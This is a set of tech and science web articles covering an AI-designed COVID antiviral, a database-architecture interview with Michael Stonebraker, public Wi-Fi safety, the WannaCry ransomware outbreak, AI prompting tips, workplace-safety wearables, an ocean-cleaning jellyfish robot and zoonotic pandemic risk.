The IBM and Oxford researchers built their model, Controlled Generation of Molecules (CogMol), on a generative AI architecture known as variational autoencoders, or VAEs. The model was then trained on a large dataset of molecules represented as strings of text, with general information about proteins and their binding properties.
Information about SARS-CoV-2’s 3D structure or molecules was left out, giving their generative foundation model a broad base of knowledge so that it could be more easily deployed for tasks it has never seen before.
Their goal was to find drug-like molecules that would bind with two COVID protein targets: the spike, which transmits the virus to the host cell, and the main protease, which helps to spread the disease.
CogMol generated 875,000 candidate molecules in three days, with the novel compounds further tested in target inhibition and live virus neutralisation tests. Two of the validated antivirals targeted the main protease; the other two targeted the spike protein and were capable of neutralising all six major variants of COVID.
“We created valid antivirals using a generative foundation model that knew relatively little about its protein targets,” said the study’s co-senior author, IBM researcher and visiting Oxford professor, Jason Crain.
“I’m hopeful that these methods will allow us to create antivirals and other urgently needed compounds much faster and more inexpensively in the future.”
This work is hailed as a success much like the work of Google DeepMind, who also achieved scientific breakthroughs with AI, with the most recent being AlphaFold which can predict protein structures. This type of work has effectively changed the way this type of science operates, as researchers can analyse data in a much shorter space of time and hopefully better tackle diseases. | <urn:uuid:6305e3c6-12e2-43e1-8c3b-7c312e730e1b> | CC-MAIN-2024-38 | https://aimagazine.com/articles/ibm-oxford-university-discover-ai-antiviral-for-covid-19 | 2024-09-15T10:09:46Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651622.79/warc/CC-MAIN-20240915084859-20240915114859-00723.warc.gz | en | 0.962211 | 861 | 2.859375 | 3 |
One of the reasons that the University of California at Berkeley was a hotbed of software technology back in the 1970s and 1980s is Michael Stonebraker, who was one of the pioneers in relational database technology, one of the industry's biggest – and most vocal – shakers and movers, and one of its most prolific serial entrepreneurs.
Like other database pioneers, Stonebraker read the early relational data model papers by IBMer Edgar Codd, and in 1973 started work on the Ingres database alongside IBM's own System R database, which eventually became DB2, and Oracle's eponymous database, which entered the field a few years later.
In the decades since the early database days, Stonebraker helped create the Postgres follow-on to Ingres, which is commonly used today, and was also the CTO at relational database maker Informix, which was eaten by IBM many years ago and just recently mothballed. More importantly, he was one of the researchers on the C-Store shared-nothing columnar database for data warehousing, which was eventually commercialized as Vertica, and a few years after that Stonebraker and friends started up the H-Store effort, a distributed, in-memory OLTP system that was eventually commercialized as VoltDB. Never one to sit still for long, Stonebraker led an effort to create an array-based database called SciDB that was explicitly tuned for the needs of technical applications, which think in terms of arrays, not tables as in the relational model.
That is an extremely abbreviated and oversimplified history of Stonebraker, who has been an adjunct professor of computer science at MIT since 2001 and who continues to shape the database world.
With so many new compute, storage, and networking technologies entering the field and so many different database and data store technologies available today, we thought it would be a good idea to touch base with Stonebraker to see what effect these might have on future databases.
Timothy Prickett Morgan: When it comes to data and storage, you have kind of seen it all, so I wanted to dive right in and get your sense of how the new compute and storage hardware that is coming to market – particularly persistent memory – will affect the nature of databases in the near and far term. Let's assume that DRAM and flash get cheaper again, unlike today, and that technologies like 3D XPoint come to market in both SSD and DIMM form factors. These make main memories larger and cheaper, and flash can get even more data closer to compute than disk drives, no matter how you gang them up, ever could. Do we have to rethink the idea of cramming everything into main memory for performance reasons? The new technologies open up a lot of possibilities.
Michael Stonebraker: The issue is the changing storage hierarchy and what it has to do with databases. Let’s start with online transaction processing. In my opinion, this is a main memory system right now, and there are a bunch of NewSQL startups that are addressing this market. An OLTP database that is 1 TB in size is a really big one, and 1 TB of main memory is no big deal any more. So I think OLTP will entirely go to main memory for anybody who cares about performance. If you don’t care about performance, then run the database on your wristwatch or whatever.
In the data warehousing space, all of the traction is at the high end, where people are operating petascale data warehouses, so up there it is going to be a disk-based market indefinitely. The thing about business analysts and data scientists is that they have an insatiable desire to correlate more and more and more data. Data warehouses are therefore getting bigger at a rate that is faster than disk drives are getting cheaper.
Of course, the counter-example to this are companies like Facebook, and if you are a big enough whale, you might do things differently. Facebook has been investing like mad in SSDs as a level in their hierarchy. This is for active data. Cold data is going to be on disk forever, or until some other really cheap storage technology comes along.
If you have a 1 TB data warehouse, the Vertica Community Edition is free for this size, and the low-end system software is going to be essentially free. And if you care about performance, it is going to be in main memory and if you don't care about performance, it will be on disk. It will be interesting to see if the data warehouse vendors invest more in multi-level storage hierarchies.
TPM: What happens when these persistent memory technologies, such as 3D XPoint or ReRAM, come into the mix?
Michael Stonebraker: I don't see these as being that disruptive because all of them are not fast enough to replace main memory and they are not cheap enough to replace disks, and they are not cheap enough to replace flash. Now, it remains to be seen how fast 3D XPoint is going to be and how cheap it is going to be.
I foresee databases running on two-level stores and three-level stores, but I doubt they will be able to manage four-level stores because it is just too complicated to do the software. But there will be storage hierarchies and exactly what pieces will be in the storage hierarchy is yet to be determined. Main memory will be at the top and disk will be at the bottom, we know that, and there will be stuff in between for general purpose systems. For OLTP systems, there are going to be in main memory, end of story, and companies like VoltDB and MemSQL are main memory SQL engines that are blindingly fast.
The interesting thing to me, though, is that business intelligence is going to be replaced by data science as soon as we can train enough data scientists to do it. Business intelligence is SQL aggregates with a friendly face. Data science is predictive analytics, regression, K means clustering, and so on, and it is all essentially linear algebra on arrays. How data science is getting integrated into database systems is the key.
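As a tiny taste of the array math this kind of data science leans on — an illustrative example, not something from the interview — here is an ordinary least-squares line fit y ≈ a·x + b computed directly over arrays of numbers:

```python
# Ordinary least-squares fit of y = a*x + b, computed from arrays.
xs = [1.0, 2.0, 3.0, 4.0, 5.0]
ys = [2.1, 3.9, 6.2, 8.1, 9.8]   # invented sample data

n = len(xs)
mx = sum(xs) / n                  # mean of x
my = sum(ys) / n                  # mean of y

# Slope = covariance(x, y) / variance(x); intercept from the means.
a = sum((x - mx) * (y - my) for x, y in zip(xs, ys)) / sum((x - mx) ** 2 for x in xs)
b = my - a * mx
print(f"y = {a:.2f}x + {b:.2f}")
```

Even this toy fit is a pure array computation — sums and products over whole columns of values — which is why array-oriented storage and execution matter so much for predictive analytics.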
Right now, it is the wild west. The thing that is popular now is Spark, but it is disconnected from data storage completely. So one option is that data science will just be applications that are external to a database system.
Another option is that array-based database systems will become popular, and SciDB, TileDB, and Rasdaman are three such possibilities. It is not clear how widespread array databases will be, but they will certainly be popular in genomics, which is all using array data.
The other option is that the current data warehousing vendors will allow users to adopt data science features. They are already allowing user-defined functions in R. It remains to be seen what is going to happen to Spark – whatever it is today, it is going to be different tomorrow. So in data science, it is the wild west.
TPM: We talked about different technologies and how they might plug into the storage hierarchy. But what about the compute hierarchy? I am thinking about GPU-accelerated databases here specifically, such as MapD, Kinetica, BlazingDB, and Sqream.
Michael Stonebraker: This is one of the things that I am much more interested in. If you want to do a sequential scan or a floating point calculation, GPUs are blindingly fast. The problem with GPUs is loading: if you can get all of your data within GPU memory, they are really fast; otherwise you have to load it from somewhere else, and loading is the bottleneck. On small data that you can load into GPU memory, they will definitely find applications at the low end where you want ultra-high performance. For the rest of the database space, it remains to be seen how prevalent GPUs are going to be.
The most interesting thing to me is that networking is getting faster at a pace that is higher than CPUs are getting beefier and memory is getting faster. Essentially all multi-node database systems have been designed under the premise that networking is the bottleneck. It turns out that no one can saturate 40 Gb/sec Ethernet. In point of fact, we have moved from 1 Gb/sec to 40 Gb/sec Ethernet in the past five years, and over that same time, clusters on the order of eight nodes have become somewhat faster, but nowhere near a factor of 40X, and memory is nowhere near this, either. So networking is probably not the bottleneck anymore.
TPM: Certainly not with 100 Gb/sec Ethernet getting traction and vendors demonstrating that they can deliver ASICs that can drive 200 Gb/sec or even 400 Gb/sec within the next year or two.
Michael Stonebraker: And that means essentially that everybody gets to rethink their fundamental partitioning architecture, and I think this will be a big deal.
TPM: When does that inflection point hit, and how much bandwidth is enough? And what does it mean when you can do 400 Gb/sec or even 800 Gb/sec, pick your protocol, with 300 nanosecond-ish latency?
Michael Stonebraker: Let's look at Amazon Web Services as an example. The connections at the top of the rack are usually 10 Gb/sec – figure it to be 1 GB/sec. The crosspoint between the nodes is infinitely fast by comparison. So how fast can you get stuff out of storage? If it is coming off disk, every drive is 100 MB/sec, so ten of these ganged in parallel in a RAID configuration will just barely be able to keep up. So the question is how fast storage is relative to networking.
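Worked out explicitly, the arithmetic above looks like this (a sketch; the interview rounds 10 Gb/sec down to 1 GB/sec, in which case ten drives just keep up, while the exact figure asks for a couple more):

```python
# Back-of-the-envelope: top-of-rack link bandwidth vs. disk throughput.
link_gbits = 10                       # top-of-rack Ethernet, Gb/sec
link_bytes = link_gbits / 8 * 1e9     # = 1.25e9 bytes/sec ("figure 1 GB/sec")

disk_bytes = 100e6                    # one drive, ~100 MB/sec
drives_needed = link_bytes / disk_bytes

print(f"Link bandwidth: {link_bytes / 1e9:.2f} GB/sec")
print(f"Drives to saturate it: {drives_needed:.1f}")
```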
My general suspicion is that networking advances will make it at least as beefy as the storage system, at which point database systems will not be network bound and there will be some other bottleneck. If you are doing data science, that bottleneck is going to be the CPU because you are doing a singular value decomposition, and that is a cubic operation relative to the number of cells that you look at. If you are doing conventional business intelligence, you are likely going to be storage bound, and if you doing OLTP you are already in main memory anyway.
With OLTP, if you want to do 1 million transactions per second, it is no big deal. Your favorite cluster will do that on things like VoltDB and MemSQL. Oracle, DB2, MySQL, SQL Server and the others can’t do 1 million transactions per second no matter what. There is just too much overhead in the software.
A bunch of us wrote a paper back in 2009, and we configured an open source database system and measured it in detail, and we assumed that all of the data fit in main memory. So basically everything is in the cache. And we wanted to measure how costly the different database functions were. In round numbers, managing the buffer pool was a big issue. The minute you have a buffer pool, then you have to get the data out of it, convert it to main memory format, operate on it, and then put it back if it is an update and figure out which blocks are dirty and keep an LRU list and all this stuff. So that is about a third of the overhead. Multithreading is about another third of the overhead, and database systems have tons of critical sections and with a bunch of CPUs, they all collide on critical sections and you end up just waiting. Writing the log in an OLTP world is like 15 percent, and you have to assemble the before image and the after image, and write it ahead of the data. So maybe 15 percent, with some other additional overhead, is actual useful work. These commercial relational databases are somewhere between 85 percent and 90 percent overhead.
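The round numbers in that breakdown can be tallied up as follows (a sketch, not a measurement; the interview attributes the remaining few percent beyond these categories to other additional overhead):

```python
# Tally of the overhead fractions described in the interview.
buffer_pool     = 1 / 3    # page cache management, format conversion, LRU list
multithreading  = 1 / 3    # latching and waiting on critical sections
write_ahead_log = 0.15     # assembling and writing before/after images

overhead = buffer_pool + multithreading + write_ahead_log
useful_work = 1 - overhead

print(f"Total overhead: {overhead:.0%}")
print(f"Useful work:    {useful_work:.0%}")
```

These three categories alone put overhead above 80 percent, which is the arithmetic behind the "85 to 90 percent overhead" claim once the miscellaneous costs are added in.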
To get rid of that overhead, you have to rearchitect everything, which is what the in-memory OLTP systems have done.
TPM: By comparison, how efficient are the array databases, and are they the answer for the long haul? Or are they not useful for OLTP systems?
Michael Stonebraker: Absolutely not. I wrote a paper over a decade ago explaining that one size database does not fit all, and my opinion has not changed at all on this.
It turns out that if you want to do OLTP, you want a row-based memory store, and if you want to do data warehousing, you want a disk-based column store. Those are fundamentally different things. And if you want to do data science, you want an array-based data model, not a table-based data model, and you want to optimize for regression and singular value decomposition and that stuff. If you want to do text mining, none of these work well. I think application-specific database systems for maybe a dozen classes of problems is going to be true as far as I can see into the future.
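A toy sketch makes the row-store versus column-store distinction concrete — the data here is invented, and real engines add compression and vectorized execution on top:

```python
# Row store: one tuple per record (id, region, amount).
rows = [
    (1, "east", 120.0),
    (2, "west", 75.5),
    (3, "east", 230.25),
]

# Column store: one array per attribute.
columns = {
    "id":     [1, 2, 3],
    "region": ["east", "west", "east"],
    "amount": [120.0, 75.5, 230.25],
}

# Analytic query: total amount.
total_row_store = sum(r[2] for r in rows)   # must touch every tuple
total_col_store = sum(columns["amount"])    # touches one contiguous array
print(total_row_store, total_col_store)
```

Both layouts give the same answer, but the column layout scans only the one attribute the warehouse query needs, while an OLTP update of a single record favors the row layout — which is the "one size does not fit all" point.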
TPM: What about data stores for machine learning? The interesting thing to me is that the GPU accelerated database providers are all talking about how they will eventually support native formats for machine learning frameworks like TensorFlow. In fact, TensorFlow is all that they seem to care about. They want to try to bridge fast OLTP and machine learning on the same database platform.
Michael Stonebraker: So back up a second. Machine learning is all array-based calculation. TensorFlow is an array-oriented platform that allows you to assemble a bunch of primitive array operations into a workflow. If you have a table-based system and an array that is 1 million by 1 million – which is 1 trillion cells – and you store that as a table in any relational system, you are going to store it either as three columns, or as one row after another holding a huge blob with all of the values. In an array-based system, you store this puppy as an array, and you optimize storage for the fact that it is a big thing in both directions. Anybody who starts with a relational engine has got to cast tables to arrays in order to run TensorFlow or R or anything else that uses arrays, and that cast is expensive.
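To make the cast concrete, here is a minimal sketch on a tiny array (4×4 standing in for 1 million × 1 million), taking the three-column reading of the relational encoding — one (row, col, value) tuple per cell — and showing the conversion an array operation would first have to perform:

```python
n = 4  # tiny stand-in for the 1,000,000 x 1,000,000 case

# Relational encoding: one 3-column tuple per cell.
table = [(i, j, float(i * n + j)) for i in range(n) for j in range(n)]

def table_to_array(triples, size):
    """The cast from table to array that native array engines avoid."""
    a = [[0.0] * size for _ in range(size)]
    for i, j, v in triples:
        a[i][j] = v
    return a

array = table_to_array(table, n)
print(len(table), "tuples vs a", n, "x", n, "array")
print(array[2][3])   # direct cell access once the cast is done
```

On a dense trillion-cell array this cast touches every tuple before any linear algebra can start, which is the expense being described.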
TPM: How much will that hinder performance? I assume it has to hurt at least one of the workloads, relational or array.
Michael Stonebraker: Let me give you two different answers. If we have a dense array, meaning that every cell is occupied, then this is going to be an expensive conversion. If we have a very sparse array, then encoding a sparse array as a table is not a bad idea at all. So it really depends on the details and it is completely application dependent, not machine learning framework dependent.
This comes back to what I was saying earlier: it is the wild west out there when it comes to doing data science and storage together.
TPM: So your answer, it would seem, is to use VoltDB on OLTP and SciDB on arrays. Are you done now?
Michael Stonebraker: Data integration seems to be a much bigger Achilles’ heel to corporations, and that is why I am involved with a third startup called Tamr, which was founded in 2013.
One of Tamr’s customers is General Electric, which has 75 different procurement systems, perhaps considerably more – they don’t really know how many they have got. The CFO at GE concluded that if these procurement systems could operate in tandem and demand most favored nation status with vendors, that would be worth about $1 billion in savings a year to the company. But they have to integrate 75 independently constructed supplier databases.
TPM: The presumption with tools like Tamr is that it is much easier to integrate disparate things than to try to pour it all into one giant database and rewrite applications or at least pick only one application.
Michael Stonebraker: Exactly. Enterprises are hugely siloed because they divide into business units so they can get stuff done, and integrating silos for the purposes of cross selling or aggregate buying or social networking, or even getting a single view of customers, is a huge deal.
Editor’s Note: Michael Stonebraker is the recipient of the 2014 ACM Turing Award for fundamental contributions to the concepts and practices underlying modern database systems. The ACM Turing Award is one of the most prestigious technical awards in the computing industry, and the Association for Computing Machinery (ACM) invites us to celebrate the award and computing’s greatest achievements. More activities and information on the ACM Turing Award may be found at http://www.acm.org/turing-award-50. | <urn:uuid:510201d8-4ea0-4c24-bc8f-f9dfe64345da> | CC-MAIN-2024-38 | https://www.nextplatform.com/2017/08/15/hardware-drives-shape-databases-come/ | 2024-09-17T23:09:17Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651835.53/warc/CC-MAIN-20240917204739-20240917234739-00523.warc.gz | en | 0.957725 | 3,427 | 2.65625 | 3 |
Open Public Wi-Fi: How To Stay Safe
One day our systems will be built to default always to secure configurations, but we're not there yet
Using open public Wi-Fi networks is dangerous business; if you're not careful, your communications are open to everyone else on the network. But there are ways to protect yourself. If you have the option, you should use an encrypted network. In the alternative, if you use an open, unencrypted network, use a virtual private network to protect your communications. Failing even that, be sure to use only HTTPS sessions.
When you look at a list of available Wi-Fi networks, there are basically two types: those that are encrypted (with the lock icon) and those that are unencrypted.
If you connect to an unencrypted network all of your traffic is open for all the world to see, unless you take other measures to encrypt it. On such a network, all users can see all other users' traffic. Worse still, other users can hijack your session and communicate with the website you were on as if they were you, or redirect your computer to a site you didn't intend to visit. These attacks, while not strictly new at the time, were made widely known by the release of Firesheep, which made it easy to do.
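As a minimal illustration of the "HTTPS only" fallback, here is a toy check of the URL scheme. A real browser of course also validates the server's certificate, which this sketch ignores entirely:

```python
# Toy rule of thumb for open Wi-Fi: only HTTPS sessions are safe to use;
# anything else travels in the clear and can be read or hijacked.
from urllib.parse import urlparse

def safe_on_open_wifi(url: str) -> bool:
    """True only for HTTPS URLs; everything else is readable on the wire."""
    return urlparse(url).scheme == "https"

print(safe_on_open_wifi("https://example.com/login"))
print(safe_on_open_wifi("http://example.com/login"))
```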
The WannaCry ransomware attack was the end result of years of ignorance on the part of governments, private-sector firms, and the public regarding how serious cyber threats have become.
The 2016 Shadow Brokers NSA hack came home to roost in a big way last week, when a code execution vulnerability contained in the Shadow Brokers dump was used to launch the largest ransomware attack in history. The WannaCry ransomware strain, also known as WannaCrypt, Wana Decryptor, and WCry, hit hundreds of thousands of computers in 150 countries before it was halted – temporarily – when a security analyst stumbled upon a “kill switch” in the code. However, even the analyst who discovered the kill switch emphasized that the fix was, indeed, temporary; reports of new variants are emerging, and the kill switch does nothing to help the armies of machines that have already been infected.
WannaCry wreaked havoc on companies in numerous industry sectors, including French car manufacturer Renault and Spanish telecommunications giant Telefonica, but perhaps the most stark illustration of the damage was what it did to Britain’s National Health Service (NHS). The Guardian reports that 45 NHS facilities were infected, forcing hospitals to redirect ambulances, postpone treatments for cancer patients, and warn patients of delays overall.
Organizations in the U.S. were fortunate; a Department of Homeland Security spokesperson told NPR that the number of WannaCry ransomware victims stateside was “very small.” But that’s only because of luck – and luck eventually runs out.
WannaCry Ransomware Took Advantage of Old, Unsupported Systems
The WannaCry ransomware nearly exclusively impacted enterprise machines, not home computers, because the latter are more likely to be running updated operating systems, and WannaCry exploits a vulnerability in Windows XP up through Windows Server 2012. Microsoft released a patch for the newer end of that range in March, but the company stopped supporting some of the older systems in the group, including Windows XP and Windows 2000, years ago. After the WannaCry attack, Microsoft took the highly unusual step of issuing an “emergency patch” for Windows XP, Windows 8, and Windows Server 2003.
As soon as WannaCry hit, the buck-passing commenced. The British media attacked the government for not sufficiently funding the NHS. Microsoft criticized the NSA for not properly securing its cyber-weaponry. Meanwhile, Microsoft itself came under fire for not issuing security updates for legacy systems that it knew were still in wide use. Security experts reiterated the age-old warnings to organizations about keeping their systems updated and engaging in proactive measures to prevent attacks like WannaCry.
Do We Have Your Attention Now?
The WannaCry ransomware attack shouldn’t have surprised anyone. Cyber security experts have been warning about large-scale attacks on critical infrastructure for years, and there have been numerous smaller-scale ransomware attacks on U.S. emergency services. The only surprising things are that it took so long for something like this to happen, and that the United States was not hit as hard as the rest of the world, particularly since preliminary evidence indicates that WannaCry may be the work of the same North Korean hackers who were behind the Sony Pictures email hack and last summer’s SWIFT network attack on a bank in Bangladesh.
American healthcare facilities are plagued with the same cyber security problems as the NHS, including antiquated legacy systems and an unwillingness on the part of organizations to invest in proactive cyber security measures. Other industries aren’t doing that much better, including the government. After all, the exploit that started all of this was stolen from an American spy agency. If the NSA cannot properly secure its systems, what does that say about everyone else?
The WannaCry attacks are the natural end result of the government, private-sector organizations, and the public engaging in reactive cyber security at best, and remaining ignorant of cyber security at worst. Mere days before WannaCry hit, the Trump Administration issued an executive order commanding the federal government to get its cyber security house in order. Private-sector organizations and, yes, individuals need to do the same. Everyone needs to be aware of the seriousness of engaging in proactive cyber security best practices and the severe potential consequences of not doing so.
Thanks to WannaCry, everyone now knows what ransomware is and what it’s capable of doing. The question is, what are we going to do with this information?
The cyber security experts at Lazarus Alliance have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting organizations of all sizes from security breaches. Our full-service risk assessment services and Continuum GRC RegTech software will help protect your organization from data breaches, ransomware attacks, and other cyber threats.
Lazarus Alliance is proactive cyber security®. Call 1-888-896-7580 to discuss your organization’s cyber security needs and find out how we can help your organization adhere to cyber security regulations, maintain compliance, and secure your systems. | <urn:uuid:95106aa3-5c3e-4a84-8fa3-a6ce333109c1> | CC-MAIN-2024-38 | https://lazarusalliance.com/wannacry-ransomware/ | 2024-09-10T18:22:42Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651303.70/warc/CC-MAIN-20240910161250-20240910191250-00323.warc.gz | en | 0.94207 | 1,041 | 2.578125 | 3 |
How to Create Great Prompts for Great AI Responses
AI (artificial intelligence) is everywhere, but one common misconception is that AI can read your mind, as AI can only act on the information it is given. This is why crafting a well-architected prompt is crucial.
A good prompt ensures that the AI understands your needs and delivers the best possible response. Here, we’ll explore the four key components of a prompt: Clear Objective, Contextual Information, Desired Format, and Tone and Style.
1. Clear Objective
The first step in creating a good prompt is to define a clear objective. What do you want the AI to accomplish? Whether it’s generating a blog post, answering a question, or providing a summary, having a specific goal in mind helps the AI focus on delivering relevant and accurate results. For example, instead of asking, “Tell me about AI,” you could ask, “Explain how AI is used in healthcare to improve patient outcomes.”
2. Contextual Information
Providing contextual information is essential for the AI to understand the background and nuances of your request. This includes any relevant details, such as the target audience, specific examples, or any constraints. Context helps the AI tailor its response to your needs. For instance, if you’re asking for a marketing strategy, mentioning the industry, target market, and current challenges will yield a more useful response.
3. Desired Format
Specifying the desired format of the response ensures that the AI delivers information in a way that meets your expectations. Whether you need a list, a detailed explanation, a summary, or a step-by-step guide, clearly stating the format helps the AI structure its output accordingly. For example, you might say, “Provide a bullet-point list of the benefits of renewable energy.”
4. Tone and Style
The tone and style of the response can significantly impact its effectiveness. Whether you prefer a formal, professional tone or a casual, conversational style, specifying this in your prompt helps the AI match your desired communication style. For example, you could request, “Write a friendly and engaging introduction to a blog post about sustainable living.”
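The four components above can be combined mechanically into a single prompt string. A minimal Python sketch follows; the function and field names are illustrative and not tied to any particular AI service or API:

```python
# Hypothetical sketch of assembling the four prompt components into a
# single request string. The function and field names are illustrative
# and not tied to any particular AI service or API.

def build_prompt(objective, context, desired_format, tone):
    """Combine the four prompt components into one prompt string."""
    return (
        f"Objective: {objective}\n"
        f"Context: {context}\n"
        f"Desired format: {desired_format}\n"
        f"Tone and style: {tone}"
    )

prompt = build_prompt(
    objective="Explain how AI is used in healthcare to improve patient outcomes.",
    context="Audience: hospital administrators evaluating new tools.",
    desired_format="A bullet-point list of five benefits.",
    tone="Professional but approachable.",
)
print(prompt)
```

Keeping the components as named fields, rather than free text, makes it easy to reuse the same context and tone across many objectives.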
Get the Most from Your AI
Creating a good prompt for AI is all about clarity and precision. By defining a clear objective, providing contextual information, specifying the desired format, and indicating the tone and style, you can ensure that the AI understands your needs and delivers the best possible response. Remember, AI can’t read your mind, but with a well-crafted prompt, it can come pretty close to understanding exactly what you need.
March 21, 2017
According to the most recent data from the International Labor Organization, every 15 seconds a worker dies from a work-related accident or disease. On top of 2.3 million deaths per year from occupational accidents, over 313 million workers suffer non-fatal work injuries. The great human cost also has an economic impact: For employers, on-the-job accidents cost billions of dollars annually due to production downtime and workers’ compensation fees.
Can technology help prevent work-related accidents and diseases? The majority of workplace injuries are easily preventable through real-time monitoring of workers. After all, connected workers – aware of (and sensed by) their environment through IoT technologies – are inherently safer.
Wearable technology can greatly improve workplace safety. For example,
- Smart bands and sensors embedded in clothing and gear can be used to monitor workers’ health and wellbeing by tracking such factors as heartrate, respiration, heat stress, fatigue and exposure. Notifications can be sent to workers’ wearable devices when critical levels are reached.
- Machine and environmental sensors can provide contextual information to field workers to help keep them informed and aware of their surroundings; and wearable GPS tracking can ensure they keep out of hazardous areas.
- Smart glasses and other HUDs allow employees to access work instructions and manuals in the field, in addition to enabling remote guidance. This aids their productivity and makes them safer, since accuracy (doing a job correctly) and safety go hand-in-hand.
- Camera-equipped wearables can also be used to document a job or incident for later review. Such data can be utilized for safety training and to identify safety issues in the work environment.
In addition to providing real-time safety information and alerts to workers, wearable devices make for a safer workplace simply by the way in which they are used, i.e. hands-free. There are some great real-world use cases of wearable technology for environmental health and safety. Read on to learn how three major enterprises are using wearables of different form factors to augment their safety efforts:
North Star Bluescope Steel
This steel producer is working with IBM on developing a cognitive platform that taps into IBM Watson Internet of Things technology to keep employees safe in dangerous environments.
The IBM Employee Wellness and Safety Solution gathers and analyzes sensor data collected from smart helmets and wristbands to provide real-time alerts to workers and their managers. If a worker’s physical wellbeing is compromised or safety procedures aren’t being followed, preventative measures can be taken.
North Star is using the solution to combat heat stress, collecting data from a variety of sensors installed to continuously monitor a worker’s skin temperature, heart rate, galvanic skin response and activity level, along with the temperature and humidity of the work environment. If temperatures rise to unsafe levels, the technology provides safety guidelines to each employee based upon his or her individual metrics. For instance, the solution might advise an at-risk worker to take a 10-minute break in the shade.
With the IBM Employee Wellness and Safety Solution, data flows from the worker to the IBM Watson IoT platform and then to a supervisor for intervention/prevention. Watson can detect hazardous combinations from the wearable sensor data, like high skin temperature plus a raised heart rate and lack of movement (indicating heat stress), and notify the appropriate person to take action. This same platform could be used to prevent excessive exposure to radiation, noise, toxic gases and more.
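The hazardous-combination logic described here can be sketched as a simple rule-based check. The thresholds below are invented for illustration; a real system like the one described would calibrate them per worker and environment:

```python
# Illustrative rule-based sketch of the hazardous-combination check
# described above (high skin temperature + raised heart rate + lack of
# movement suggesting heat stress). The thresholds are invented for
# illustration; a real system would calibrate them per worker.

def heat_stress_alert(skin_temp_c, heart_rate_bpm, activity_level):
    """Return True when the sensor combination suggests heat stress."""
    high_temp = skin_temp_c >= 38.0       # elevated skin temperature
    raised_hr = heart_rate_bpm >= 110     # raised heart rate
    low_movement = activity_level < 0.2   # little or no movement (0-1 scale)
    return high_temp and raised_hr and low_movement

# Hot, tachycardic, and motionless: alert. Normal temperature: no alert.
print(heat_stress_alert(38.5, 120, 0.05))  # True
print(heat_stress_alert(36.5, 120, 0.05))  # False
```

The point of combining readings is that any one signal alone (a raised heart rate, say) is ambiguous, while the combination is much more specific.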
John Deere, best known as a manufacturer of agricultural equipment and machinery, is using Virtual Reality headsets to evaluate and assess the “assembly feasibility” of new machine designs. Performing ergonomic evaluations in VR improves the safety of production employees by revealing the biomechanics of putting a proposed machine together. High risk processes can be identified and corrected before they pose a problem for the assembler on the shop floor.
In one of these VR reviews at John Deere, an operator puts on a headset and becomes completely immersed in a virtual production environment. Reviewers can see what the operator sees, and determine whether a potential design is safe to manufacture. They can see all the safety aspects that would go into assembling the product, including how the worker’s posture would be affected, whether there is chance of physical injury, what kinds of tools would be required, etc.
John Deere believes VR-aided design evaluations can result in less fatigue, fewer accidents, and greater productivity for its manufacturing team, and the method has already proven effective in reducing injuries at the company. Learn more about this use case at EWTS 2017, where Janelle Haines, Ergonomic Analyst and Biomedical Engineer at John Deere, will participate in an interactive workshop on “Leveraging Virtual Reality in the Enterprise.”
The electricity and gas utility company is exploring wearable tech for lone worker health and safety. National Grid believes wearables can have multiple advantages in the workplace, including improving safety as well as speeding up the process of repairs and reducing costs. The ngLabs team is responsible for looking at the latest technologies; in one of its first projects, the team is focusing on the critical worker:
The project uses interactive wristbands developed by Microsoft to monitor the health, safety and wellbeing of workers who operate alone or remotely. The smart bands track location, measure vital statistics like heart rate, and enable remote/lone workers to send a signal to colleagues when they’ve arrived on site or checked out without having to make a call or fill out paperwork. Information is captured quickly, making it easier to spot problems and send alerts if something goes wrong.
Hear more about this use case in San Diego this May—David Goldsby, Technology Innovation Manager at National Grid, will present a case study on “Digital Disruption and Consumerization in Utilities” at EWTS ’17. | <urn:uuid:6cbb3424-06a4-439f-9e5a-73309a08c9a6> | CC-MAIN-2024-38 | https://www.brainxchange.com/blog/3-great-use-cases-of-wearable-tech-for-ehs | 2024-09-13T04:47:17Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651507.67/warc/CC-MAIN-20240913034233-20240913064233-00123.warc.gz | en | 0.938468 | 1,206 | 2.84375 | 3 |
Robotic Jellyfish Designed to Target Ocean Pollution
The underwater robot collects trash as it swims
A jellyfish-inspired underwater robot could be an answer to the ongoing problem of global ocean pollution.
Designed by a team from the Max Planck Institute for Intelligent Systems (MPI-IS), the Jellyfish-Bot collects waste as it moves through the water, creating a vortex of air beneath its body that enables contactless collection and protects the potentially delicate ecosystems around it.
The design is also near-silent, providing a less invasive waste collection tool than other robotic solutions currently available.
The team designed the robot’s body around electrohydraulic actuators, which act like artificial muscles. Electric currents flow through the actuators, powering the robot’s movement by expanding and contracting its ‘muscles’.
"When a jellyfish swims upwards, it can trap objects along its path as it creates currents around its body,” said Tianlu Wang, first author of the study. “In this way, it can also collect nutrients. Our robot too circulates the water around it. This function is useful in collecting objects such as waste particles. It can then transport the litter to the surface, where it can later be recycled.”
According to Wang, the robot could also be used to collect fragile biological samples such as fish eggs, transporting them to the surface for collection.
"Seventy percent of marine litter is estimated to sink to the seabed,” said Hyeong-Joon Joo, study co-author. “Plastics make up more than 60% of this litter, taking hundreds of years to degrade. Therefore, we saw an urgent need to develop a robot to manipulate objects such as litter and transport it upwards. We hope that underwater robots could one day assist in cleaning up our oceans."
Jellyfish-Bot has also been given the capacity to grasp and hold objects, with arms that are integrated into the design.
"We achieved grasping objects by making four of the arms function as a propeller, and the other two as a gripper,” said Joo. “Or we actuated only a subset of the arms, in order to steer the robot in different directions. We also looked into how we can operate a collective of several robots. For instance, we took two robots and let them pick up a mask, which is very difficult for a single robot alone. Two robots can also cooperate in carrying heavy loads. However, at this point, our Jellyfish-Bot needs a wire. This is a drawback if we really want to use it one day in the ocean."
Next, the team said it hopes to develop Jellyfish-Bot to be wireless and further improve its navigation and operational capabilities.
Can AI spot the next pandemic before it starts?
A zoonosis, as defined by the World Health Organization (WHO), is an infectious disease transmitted from wild animals to humans – and such diseases can be deadly enough to cause pandemics. The principal drivers of transmission are increasing human encroachment on animal habitats, a changing climate, and the growing movement of people, animals, and animal products through international trade. The Global Virome Project estimates that around 1.7 million animal viruses exist that can infect birds and mammals. Scientists believe almost half of those viruses can spread to humans. Understanding these viruses has now become key to preventing pandemics, or at least to being better prepared in case one hits us.
